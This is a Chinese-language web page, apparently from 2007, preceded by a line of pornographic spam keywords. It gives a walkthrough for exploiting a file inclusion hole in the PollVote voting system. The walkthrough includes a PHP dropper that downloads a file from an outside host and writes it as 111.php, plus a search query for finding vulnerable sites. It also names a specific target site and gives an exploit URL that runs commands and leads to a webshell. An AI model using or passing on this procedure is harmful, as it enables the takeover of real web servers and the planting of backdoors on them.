欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PollVote投票系統(tǒng)漏洞利用

 更新時間:2007年01月16日 00:00:00   作者:  
PollVote是一個投票系統(tǒng),今天看了非安全的雜志,看了利用方法, 

不過作者說利用過程的時候很煩瑣,關鍵的時候又沒說明白, 

簡單的說一下`` 

首先建立2個文本 分別是creatfile.txt和phpdoor.txt 

creatfile.txt內容寫 

<? 
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); 
$ff=fopen("111.php","a"); 
fwrite ($ff,$f); 
fclose($ff); 
?> 

phpdoor.txt內容就寫個PHP木馬 

之后在http://www.google.com 搜索關鍵詞"pollvote.php?pollname" 

有很多, 
搜索到一個http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg 


就是他了 

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls 

這個就是利用原理了, 
剛才說到的creatfile.txt和phpdoor.txt這個2個文件都上傳到自己的空間里 

執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt 

這樣 
phpdoor.txt里的內容就會生成一個111.php 

這樣我們就得到WEBSHELL了 

http://www.skinnyturd.co.uk/poll/111.php  

相關文章

最新評論